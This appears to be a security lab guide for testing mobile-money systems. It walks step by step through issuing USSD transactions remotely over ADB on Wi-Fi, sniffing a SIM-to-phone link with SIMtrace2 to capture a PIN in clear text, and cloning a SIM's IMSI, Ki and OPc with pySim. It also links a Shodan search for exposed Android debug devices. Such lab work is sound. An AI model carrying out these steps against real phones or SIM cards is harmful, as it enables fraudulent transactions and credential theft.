# Remote USSD execution on the device using ADB
The goal of this lab is to demonstrate the ability of a remote attacker to access a rooted device remotely and being able to execute mobile money transactions using USSD.
## Hardware and software requirements
To perform this lab, the following hardware equipment is prerequisite:
1. An android device
2. A Wi-Fi router
3. A personal computer with ADB tools installed.
### Hardware setup
The schematic below shows the general setup of the lab.
a). Insert the SIM into an android device with USB debugging enabled under developer options.
> The developer options screen is made visible by going to Settings > About Phone and tap Build number seven times.
b). Connect the smartphone to the host computer with a USB cable, verify by executing the command `$ ./adb devices` on the host computer, a list of the devices attached to the computer will be displayed.
c). The mobile device and host machine are connected to a shared Wi-Fi hotspot.
d). IP address of the mobile device can be identified on the host machine by executing the
command.
`$ ./adb shell ip addr show wlan0`
The device IP will be listed, let us assume the IP is 192.168.1.104
*Figure 2: Schematic setup of the ADB connection*
e). Enable ADB over WiFi on the target device:
`$ ./adb tcpip 5555`
Connect to the mobile device by its IP address using the command below:
`$ ./adb connect IP_Address:5555`
f). Confirm that the host computer is connected to the target device via Wi-Fi using the command.
`$ ./adb devices`
*Figure 3: connecting to a mobile device remotely via android ADB*
g). With the USB removed, test the execution of mobile USSD commands remotely to a device using the commands below run on the shell of the computer.
`$ ./adb shell`
`$ am start -a android.intent.action.CALL -d tel:"*150*00%23"`
Sending inputs and ENTER
`$ input text "1"`
`$ input keyevent KEYCODE_ENTER`
Figure 4: Issuing a USSD command using ADB shell
### Exploitability of remote USSD execution ADB
This lab shows that a remote attacker who had access to the device could later issue USSD commands remotely and can complete a DFS transaction.
Devices vulnerable to this attack can also be viewed here:
https://beta.shodan.io/search?query=Android+debug
# Man-in-the-middle attacks on STK SIMs
This lab is used to verify the confidentiality of the communication between the SIM card and the mobile phone.
#### This lab demonstrates the practical case that:
* An attacker with temporary physical access to a phone used for STK for DFS applications could Insert a proxy or thin-SIM (such as the Turbo SIM) Between the user’s SIM and phone to sniff a DFS user mobile PIN, which can later be used to initiate transactions remotely.
* This test also demonstrates that the communication between the Mobile Equiqment (ME) and SIM card is not encrypted and shows the threats associated with thin SIMs.
## Hardware tools
#### The following hardware requirements are needed to illustrate this lab:
a) SIMtrace2 Hardware Kit
*Figure 1: SIMtrace hardware kit*
b) a USB A to mini-B cable
c) A set of four flexible PCB SIM adapters for 2FF SIM card size, one in each orientation
*Figure 2: PCB SIM adapters*
## Hardware and software lab setup
#### Setup the hardware using the diagrams and steps below:
a) Insert the SIM card in the SIM Trace hardware with the cut end in first.
*Figure 3: Inserting SIM card into the SIMtrace hardware*
b) Connect the flex cable to the SIMtrace hardware and the SIM-end adapters to the phone SIM pocket.
c) Connect the SIMtrace hardware via USB to the host machine.
*Figure 4: SIMtrace hardware setup*
#### Testing using SIMtrace software
a) Launch the terminal
b) Confirm that the SIMtrace hardware is detected on the USB interface by issuing the command:
`$ lsusb`
*Figure 5: Checking SIM trace connection on the laptop*
c) Launch Wireshark and begin capturing packets at the localhost interface.
d) On the terminal use the command `simtrace2-sniff` to start the packer sniffing
`$ sudo simtrace2-sniff`
e) Perform transactions using the STK menu of the phone and you will notice TPDU packets captured on the terminal as well as the Wireshark capture
*Figure 6: SIMtrace output*
f) Save the captured packets using Wireshark for analysis.
g) Analyze the packets using Wireshark for the packets captured relating to the STK transactions between the SIM card and the mobile device by looking for GSM packets
h) Using wireshark, analyse packets of the payload messages from the terminal response by reading the text strings in the packet details.
i) The Wireshark capture in figure 7 is a sample result and shows that an attacker can read the PIN (in this case 5453) and data as it is keyed into the device with the SIM trace.
*Figure 7: Sample wire shark output from SIMtrace – This Wireshark trace shows that the PIN was captured in clear text by SIMtrace.*
## Exploiting the SIM vulnerabilities
This lab demonstrates the risk associated with devices with easy access to the hardware components that hold the SIM card and exposed the risks associated with a thin SIMs.
Another possibility could be through a *Bladox Turbo SIM* which can also be inserted between the SIM and the phone to perform Man-in-the-Middle the traffic between both.
# SIM clone attack
The goal of this lab is to assess whether an attacker who can clone a SIM card can successfully authenticate the cloned SIM to the mobile money service and make fraudulent transactions. This attack may only be possible on SIM cards which support the most obsolete version of A3 algorithm – COMP128v1.
## Lab Setup
We attempt to clone a SIMcard using the opensource pySIM.
>**pySim** is a suite of programs (develped in python) for interfacing with SIM/UICC/USIM/ISIM cards.
* Connect SIM card reader to the lab computer.
* Insert programmable SIM card.
*Figure 1: SIM card reader setup*
a) Run
`$ sudo pcsc_scan`
>**pcsc_scan** is a program that regularly scans every PC/SC readers connected to the host and display the status of the cards inserted in the readers. PC/SC is a standard API for how applications access smart card readers.
*Figure 2: Output from scanning SIMcard reader using pcsc_scan*
b) Read sim card using:
`$ sudo ./pySim-read.py -p 0`
**pySim-read** allows to read some of the most important data items from a SIM card. Common fields include:
* ICCID (Integrated Circuit Card Identifier): A unique serial number identifying the SIM card.
* IMSI (International Mobile Subscriber Identity): A unique identifier for a mobile subscriber, used for identifying the user in the mobile network.
* SMSP (SMS Service Center Address): The address of the Short Message Service Center (SMSC) used for sending and receiving SMS messages.
* ACC (Access Control Class): Determines which services the SIM card is authorized to access.
* MSISDN (Mobile Station International Subscriber Directory Number): The full phone number of the SIM card.
* MCC (Mobile Country Code): A three-digit code identifying the country of the mobile network operator.
* MNC (Mobile Network Code): A two or three-digit code identifying the specific mobile network within a country.
* Ki (Key Identifier): A secret key used in the authentication process between the SIM and the network.
* OPc (Operator Code): A derived key used in 3G/4G authentication, derived from Ki and OP (Operator Key).
* PIN_ADM/ADM1/PIN_ADM_HEX (Administrative PIN): PINs used for administrative access to the SIM card, crucial for programming.
*Figure 3: Output from reading SIMcard using SIMpy*
c) Copy above SIM details, insert blank card and try with the following parameter sets based on the original card.
`$ sudo ./pySim-prog.py -p 0 -n OPERATERNAME -t CARDTYPE -i IMSI -c COUNTRYCODE -x MCC -y MNC -s ICCID -i IMSI -k KI -o OPC`
>**pySim-prog** was the first part of the pySim software suite. It started as a tool to write ICCID, IMSI, MSISDN and Ki to very simplistic SIM cards, and was later extended to a variety of other cards. As the number of features supported became no longer bearable to express with command-line arguments, pySim-shell was created.
*Figure 4: Output from accessing a shell using SIMpy*
d) When programing the SIM card use command below to get overview of possible options.
`$ sudo ./pySim-prog.py -help`
## Simtrace Installation
This tool is set up to run on a Linux based system.
a). Install the following dependencies and utilities for building packages:
`$ sudo apt install build-essential libtool libtalloc-dev shtool autoconf automake git-core pkg-config make gcc`
`$ sudo apt install devscripts`
b). Install the libosmocore dependencies:
`$ sudo apt install libgnutls28-dev doxygen libtalloc-dev debhelper dh-autoreconf libpcsclite-dev libsctp-dev libusb-1.0-0-dev libmnl-dev libsystemd-dev liburing-dev`
c). Download libosmocore, build the debian packages and install:
`$ git clone git://git.osmocom.org/libosmocore.git`
`$ cd libosmocore`
`$ debuild -uc -us`
`$ cd ..`
`$ sudo dpkg -i *deb`
d). Install simtrace2 dependencies:
`$ sudo apt install libusb-1.0-0-dev libpcsclite-dev libnewlib-arm-none-eabi gcc-arm-none-eabi`
e). Download simtrace2, build the package and install:
`$ git clone git://git.osmocom.org/simtrace2.git`
`$ cd simtrace2`
`$ debuild -uc -us`
`$ cd ..`
`$ sudo dpkg -i *deb`
f). Configure the permissions to launch simtrace2 for the user:
`$ sudo adduser $USERNAME plugdev`
`$ sudo wget -O /etc/udev/rules.d/99-simtrace2.rules https://gitea.osmocom.org/sim-card/simtrace2/src/branch/master/host/contrib/99-simtrace2.rules`
`$ sudo service udev reload`
`$ sudo udevadm control --reload-rules`
`$ sudo udevadm trigger`
g). To monitor trace the data, install Wireshark, and grant access rights to the user to run traces:
`$ sudo apt install wireshark`
`$ sudo chmod +x /usr/bin/dumpcap`
h). The software setup is now ready for tracing packets between the SIM and the phone.
## ADB Tool Installation
Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device.
Download the ADB ZIP file for Linux:
`$ wget https://dl.google.com/android/repository/platform-tools-latest-linux.zip`
`unzip platform-tools-latest-linux.zip`
`cd platform-tools`
OR
`$ sudo apt install adb`
On the phone, go to Settings → About Phone and tap the build number 7 times or before you get a message saying that the Developer options are enabled.
On the phone, go to Settings → System → Advanced → Developer options. Turn on USB debugging.
Connect your phone to your Linux machine with your USB cable. Change the connection mode to “PTP” mode, select "Always allow from this computer" .
This needs to be done every time the phone is connected to the laptop.
`$ ./adb devices`
Back on your smartphone or tablet device, you will see a prompt asking you to allow USB debugging. Go ahead and grant it.
If everything was successful, you should now see your device’s serial number in the Terminal window output. You can now run any ADB command on your machine.
## PySIM Installation
PySIM is used for testing susceptibility of a sim to a clone attack.
### Prerequisites
* Programmable USIM card support.
* A PCSC compatible smart card reader/programmer with APDU support.
Install software dependencies by typing the following commands to the terminal window:
`$ sudo apt-get install python3-pyscard python3-serial python3-pip`
`$ sudo apt-get install pcscd pcsc-tools libccid libpcsclite-dev`
`$ sudo pip3 install pytlv`
Verify PC/SC service is running
`$ sudo systemctl enable pcscd`
`$ sudo systemctl start pcscd`
`$ sudo systemctl status pcscd`
Download the PySim repo from the official libosmocore.git repository using:
>`$ git clone https://gitea.osmocom.org/sim-card/pysim`
>
>`$ cd pysim`
>
>`$ sudo apt install pcscd libpcsclite-dev python3 python3-setuptools python3-pycryptodome python3-pyscard python3-pip`
>
>`$ sudo pip3 install -r requirements.txt`
>
>`$ sudo ./pySim-prog.py -help`
Sign in with Wallet
Connect another wallet